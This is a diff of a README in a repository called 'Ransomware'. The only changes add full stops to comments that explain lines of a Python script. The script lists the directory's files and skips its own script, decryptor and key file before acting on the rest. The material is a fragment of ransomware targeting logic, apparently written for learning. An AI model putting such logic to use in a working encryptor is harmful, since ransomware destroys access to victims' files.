AdrianAgulto/Ransomware/README.md

 for file in os.listdir() // This is a for loop, this will list all the files in the directory.

-if os.path.isfile(file) // If object is a file, add to the file list
+if os.path.isfile(file) // If object is a file, add to the file list.

-if file == "MALWARE.py" or file == "thekey.key" or file == "DECRYPT.py": // We are about to create a conditional statement to exclude these files from the list
+if file == "MALWARE.py" or file == "thekey.key" or file == "DECRYPT.py": // We are about to create a conditional statement to exclude these files from the list.

 continue // This tells the script to continue to the next statement and skip the current iteration, meaning the files in the if statement above will be excluded from the rest of the script.